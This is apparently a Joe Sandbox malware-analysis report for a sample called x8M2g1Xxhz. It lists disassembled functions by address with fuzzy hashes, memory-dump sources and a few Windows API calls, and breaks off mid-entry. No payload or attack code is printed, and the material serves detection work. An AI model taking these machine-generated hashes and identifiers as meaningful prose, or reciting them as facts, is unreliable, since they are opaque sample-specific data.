Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d470410cc084910ecfa7825e2fe626d911dda32eb14041210f4abaf4b4738c03
Instruction ID: 84fa99a6fc2cfe3384ab23838d74515dc6d76809627cf3ff1495e3b4a8b95b65
Opcode Fuzzy Hash: d470410cc084910ecfa7825e2fe626d911dda32eb14041210f4abaf4b4738c03
Instruction Fuzzy Hash: 7421E7B5D002589FDB10CFAAD984ADEFBF4FB48310F14842AE954A7350D374A954CFA5

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401899

Memory Dump Source

Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 90f9085a524fbb973363f4e02843db0909aa23c81e0a3be8111655e252562ff2
Instruction ID: 9cb55483c9c792efff8d56851843f0bf9cc56964abd505c4856922daeff471a2
Opcode Fuzzy Hash: 90f9085a524fbb973363f4e02843db0909aa23c81e0a3be8111655e252562ff2
Instruction Fuzzy Hash: F7F0A073501322A7E331AA658881B57A6D8DF90B28F14863FE944BB391D3B9D85482DA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ea45c430fa8bc106429c5a95eea63df46617910d36ba2768bc57acca57213177
Instruction ID: e31aa616aa3857f56301d2fc56666e4192b2036f50cea25ab3366fa0e910ebf6
Opcode Fuzzy Hash: ea45c430fa8bc106429c5a95eea63df46617910d36ba2768bc57acca57213177
Instruction Fuzzy Hash: 2DD0A732B9534869EB117FB46C04B3337DCA380799F40487AB90CC6180F678D641C148

Function 0471DA90 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

U, xrefs: 0471DA9D

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 58492d2c803a433413623a1cd007d926efaafc99df3fe7460eeef47da09097bc
Instruction ID: c85af47d74f0576ffd408ec64ad94c680a1620e765d26913fae76dd6d1451b62
Opcode Fuzzy Hash: 58492d2c803a433413623a1cd007d926efaafc99df3fe7460eeef47da09097bc
Instruction Fuzzy Hash: A351D874E01208DFDB58DFAAD59499DBBF2FF89300F20816AE815AB364DB31A845CF40

Function 0471E55B Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f963f334fee6acb783bc3caa41d0b3ad865c775f9b812abce66c4b748f46824
Instruction ID: 3c4a9b0c0d3c9de6be453eaafd023b4a4905c56b00247e6342dbb7294076951c
Opcode Fuzzy Hash: 3f963f334fee6acb783bc3caa41d0b3ad865c775f9b812abce66c4b748f46824
Instruction Fuzzy Hash: C212A77403134ECFD3802F74A6AE5AABB65FF8F36BB11AD54E01EC46059F781489CA61

Function 0471E568 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3057eecd7b17f65a480074efff32b075e926b44380e542e97cdfbf1f658f285
Instruction ID: 8a7607786cad594563b97f93da222efb663628263b3f3f0429e6a34736db6281
Opcode Fuzzy Hash: b3057eecd7b17f65a480074efff32b075e926b44380e542e97cdfbf1f658f285
Instruction Fuzzy Hash: EF12977403134FCFD2802F74A6AE5AABB65FF8F36BB11AD14E41EC46449F781489CA61

Function 047111A0 Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90aa3c5aad953736da7cf3e3166244457a87bdacc1ecc9efe3461d8424b8b53f
Instruction ID: 5845b1acab4838d04a33f14169b8be901aafa159a689be13dd9094e68173b17b
Opcode Fuzzy Hash: 90aa3c5aad953736da7cf3e3166244457a87bdacc1ecc9efe3461d8424b8b53f
Instruction Fuzzy Hash: 6A52C2789113198FDB68EF64E995BDDBBB1FB48301F0081A5E90AA7351DB346E81CF81

Function 04717C08 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e281eb5f05cde78fa121899edba6554db5c30ea27de6a3f02e59fb0d326cfb9e
Instruction ID: cc2e573cc765ef872a73b8aa8f463eac6b00ac9cc800a8bacbc9de6c105968d7
Opcode Fuzzy Hash: e281eb5f05cde78fa121899edba6554db5c30ea27de6a3f02e59fb0d326cfb9e
Instruction Fuzzy Hash: 43125930A002489FCB18DF69D884AAEBBF2FF49314F158599E855AB361D730FD41CB61

Function 047195AF Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0562224ef45200cf815a553d66afa2653d30a8a1c10766dfd1ff701d705bde2f
Instruction ID: 4da5565a190d560428ad1cd7fd829b34b94f8dd760f6f7d85df6dac11d63477f
Opcode Fuzzy Hash: 0562224ef45200cf815a553d66afa2653d30a8a1c10766dfd1ff701d705bde2f
Instruction Fuzzy Hash: 8EE182F03042019FEB259A3ED478B7977A6AF85704F1940AAE606CF3B1EA25EC42D751

Function 0471B5C8 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e497ae6dfec8e78d33c1bdf82e4e25c525075e944d086bc8658a56e1e02b2ba
Instruction ID: 28f18a643c4bd594d3d5dcdd013baf8f1bfcb32db415a82d382b3a4aceff6469
Opcode Fuzzy Hash: 6e497ae6dfec8e78d33c1bdf82e4e25c525075e944d086bc8658a56e1e02b2ba
Instruction Fuzzy Hash: E4F1E675A00214CFCB14CF6DD988AA9B7B6BF89714B1A8069E555AB372CB31FC42CB50

Function 04710890 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cb24b07ac9ce8c8d902dbf80b9e0f77fe1f2032f8d4264d09b6648dbd547c
Instruction ID: 3d3e7ca9ee2536f9b9fcdeb48c2aac12cdd68ffde055e26a01114dc69802699f
Opcode Fuzzy Hash: ae9cb24b07ac9ce8c8d902dbf80b9e0f77fe1f2032f8d4264d09b6648dbd547c
Instruction Fuzzy Hash: 30B105347106408FE758DF39D898A69BBE2BF89714B2581A9E506CB7B1DB31FC41CB90

Function 04670988 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08b5af218e2eb3f8f7b5b320ea4b9b78ea7c212f8cb28fb16de2c540c34d3d3
Instruction ID: 5a829c51ab7cdb63b390ec96cde1deffbd6b273c90be5517327733725682f06d
Opcode Fuzzy Hash: d08b5af218e2eb3f8f7b5b320ea4b9b78ea7c212f8cb28fb16de2c540c34d3d3
Instruction Fuzzy Hash: 4651CDEB30D114BDB612D4916F50EFBA7AED6D3B347319427F802D6242F2992E8B6131

Function 04716448 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6eb67726c3a7f56e5c40ea728cdf1db8a2bbf1a62290711c204b05f8db121d9
Instruction ID: 90b5c3a5a8e66f9e52e82d2fc7985e30bb1e67b6e82a7ae58f2da2bb80ac9442
Opcode Fuzzy Hash: a6eb67726c3a7f56e5c40ea728cdf1db8a2bbf1a62290711c204b05f8db121d9
Instruction Fuzzy Hash: 8391CD307042058FEB2A9F68C854B7A7BA6FFC9304F148469E9469B3A5DF79EC01C791

Function 046709BA Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e6ddcf42635a88c87736a484043a55eb30d5452823208d4b7ac1ab605102c5
Instruction ID: b446d1cf4fcfdb5304ccb97ca35bf9e256787c7fa22327c908318e86a0a05c70
Opcode Fuzzy Hash: c5e6ddcf42635a88c87736a484043a55eb30d5452823208d4b7ac1ab605102c5
Instruction Fuzzy Hash: 1E51CCEB30D114BDB612D1956F50AFBA7AED5D3B347318437F802D2242F2952E8B6131

Function 0467098E Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ed65c2d14792eb4fd96cfde1ff2bc217759b7c6bc1eb7aa556e4b8bb8bd36a
Instruction ID: b382db89f78fd6c62e6d1fcf11fbd6614225095f0bd0233e3494bfb8433bf19e
Opcode Fuzzy Hash: 38ed65c2d14792eb4fd96cfde1ff2bc217759b7c6bc1eb7aa556e4b8bb8bd36a
Instruction Fuzzy Hash: 6D419BEB20D114BDB252D0856F50EFBA7AEE5D6B347319427F802D6242F2992E8B6131

Function 046709A1 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff754175c6d6aca4cb89ca874eb7c7df502eb8017c3c683f9443f2668849553a
Instruction ID: c0be9d08a7544a56539fb24e7c396a00fb6af667bf0447d90e79dc42891c596f
Opcode Fuzzy Hash: ff754175c6d6aca4cb89ca874eb7c7df502eb8017c3c683f9443f2668849553a
Instruction Fuzzy Hash: AC41DBEB30D114BDB212D0916F50EFBA7AEE5D6B307358437F802D6642F2952E8B6131

Function 04710883 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049d91fc47ba9814afa7e9d43983712d3de80a99596434f3be0f9588f4b02660
Instruction ID: 6511340af5544140b9b10d56955e09cc1629a79605d29768b09d7e4f093acb20
Opcode Fuzzy Hash: 049d91fc47ba9814afa7e9d43983712d3de80a99596434f3be0f9588f4b02660
Instruction Fuzzy Hash: 02A1F4387106008FD758DF29D898A6ABBE2BF89714B1584A8E50ADB771DB71FC41CB90

Function 047169A8 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee7e236db248d693298fb848a04a38748a3baefb682b13ac8405969da5958bd
Instruction ID: 9770fef7cae9d7f2c8e38c74669685e08a3b61734693e5294f5c0b88e968537b
Opcode Fuzzy Hash: 3ee7e236db248d693298fb848a04a38748a3baefb682b13ac8405969da5958bd
Instruction Fuzzy Hash: F2916C34B00115CFDB24DFADC888AA9B7B2BF89315B2581A9D515AB371DB31F841CB90

Function 046709E4 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716e4579757b3b601b612323940a82f003eacb746f1f02d9d01ca03400dddfab
Instruction ID: 1220fcfa280ba2113d980a6732da1ccb0146fc545959ced28c7437b6e48cf348
Opcode Fuzzy Hash: 716e4579757b3b601b612323940a82f003eacb746f1f02d9d01ca03400dddfab
Instruction Fuzzy Hash: 3C41BDEB20D114BDB212D4856F10EFBA7AED5D6B347318437F802D6602F2952E8F6131

Function 08519CC7 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801830365.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6f06602e1e6f0711da7b1ad57f3c8eef35ee9dc6ef1eb3f3dcb71bb6f3977f
Instruction ID: 1ee9325a52b06db00b71dfbd47c3d6589c2f4aee8f63a16b0e66d1a52ca39542
Opcode Fuzzy Hash: 7c6f06602e1e6f0711da7b1ad57f3c8eef35ee9dc6ef1eb3f3dcb71bb6f3977f
Instruction Fuzzy Hash: C8B1B074E002298FEB64DF65C850BEDBBB2BB89300F1081EAD94DA7290DB715E85CF51

Function 08519CC8 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801830365.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c20ae4ce9220462b8d5da2879b2d47c771d7cfa6ddd7521453d4d76a51c624c
Instruction ID: 2e40481c72312caf45c5726c95c9ca6e29210c440b256c0ad437a66fbee98381
Opcode Fuzzy Hash: 5c20ae4ce9220462b8d5da2879b2d47c771d7cfa6ddd7521453d4d76a51c624c
Instruction Fuzzy Hash: FEB1B074E002298FEB64DF65C850BEDBBB2BB89300F1081EAD94DA7290DB715E85CF51

Function 046709ED Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7e3be6f3c006bf3ad4161c6625ad179d9c3d1e637fb8afd85ad75e3a71451e
Instruction ID: 190b5c48fa9d7957245d85eed2eb74cb0ea83c6f30f5bc63a26c4fb201c80e6d
Opcode Fuzzy Hash: 8c7e3be6f3c006bf3ad4161c6625ad179d9c3d1e637fb8afd85ad75e3a71451e
Instruction Fuzzy Hash: 0E41BBEB30C114BDB612D5866F10EFBA7AED5D6B347358437F802D6202F2962E8B6131

Function 04670A72 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53738cd6382fef15131f1f3a4df5052b753c01a8eece923edc8adac9bbabc124
Instruction ID: 5ca2bae2072483422a22eaf9f326cc1cf8c31fbfed1ad541b08f19dda4a545b8
Opcode Fuzzy Hash: 53738cd6382fef15131f1f3a4df5052b753c01a8eece923edc8adac9bbabc124
Instruction Fuzzy Hash: 1941DEEB20D114BDB212D5856F10AFBB7AED5D6B347318437F802D6202F2952E8F6131

Function 04670A25 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08833ce89394e417f1da6eb91c348e980be74795a8190a8317651130a883aeaa
Instruction ID: 58bf2adaa020d8512732e17c24d04e5d6add4854b09462562805cf7b898fa01f
Opcode Fuzzy Hash: 08833ce89394e417f1da6eb91c348e980be74795a8190a8317651130a883aeaa
Instruction Fuzzy Hash: 9241CCEB20C115BDB212D5856F50AFAB7AED5D6B34B358437F802D6202F2962E8B6131

Function 08518ED0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801830365.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac5fbc50f5085ea2d8ddf84091bce77d72b29db97b474146ed82b25aece8e75
Instruction ID: 356efbf8ce13246f72fef58ef4a9da9c69c94233b2b251691fd1e12ed8e07153
Opcode Fuzzy Hash: 3ac5fbc50f5085ea2d8ddf84091bce77d72b29db97b474146ed82b25aece8e75
Instruction Fuzzy Hash: EE717F31F002199BEB19DFA9C8506AE7BB2BFC9710F548529E405B7380DF359D46CBA1

Function 047185F0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca00cb708f04a7f1428378eb10a603804e0e4fe272faf71fa6673df5f560bd9
Instruction ID: 0d2430fb3a63990acb6f56d906d478079760471d9431ab0fd7c612081c6ad483
Opcode Fuzzy Hash: bca00cb708f04a7f1428378eb10a603804e0e4fe272faf71fa6673df5f560bd9
Instruction Fuzzy Hash: 9E713E347002458FCB15EF6EC898AAE7BE9AF49740F1644A9E911CB371DB74EC41CB92

Function 0857F370 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801854824.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8570000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceaab3b6d4eefe554a77159121637bde4035859b7d82e8ed7f72ddd4fb176455
Instruction ID: 1ff869dbf55823963eec88f58c9aa0d52999b26ebb11a1241409231df36c409d
Opcode Fuzzy Hash: ceaab3b6d4eefe554a77159121637bde4035859b7d82e8ed7f72ddd4fb176455
Instruction Fuzzy Hash: 0D61A175B101158FCB14DF78E888A6E7BF6BF88612B1585ADE505DB361DF30DC028B91

Function 04670AA5 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab79b0a5995d37f2bdad608618ea36ef0cfc389f06fd845fc8b91eb4405f7adb
Instruction ID: 67adde4494356cabf98f273aeede05fdc09ed72e3b2438a49625353c036d44c3
Opcode Fuzzy Hash: ab79b0a5995d37f2bdad608618ea36ef0cfc389f06fd845fc8b91eb4405f7adb
Instruction Fuzzy Hash: CA31B0EB20D114BDB202D5816F50AFAB7AED5D3B347318437F802D2542F2962E8F6131

Function 04670A61 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3796972564.0000000004670000.00000040.00001000.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4670000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89126b1c69b2cc61ee597ad4bc5ae36fd233fbe36fb3f81dd474e181f47b7775
Instruction ID: 773496b69fb39d627e5dc3392738e0cd460ef14d45d982ee91e67547db8402d8
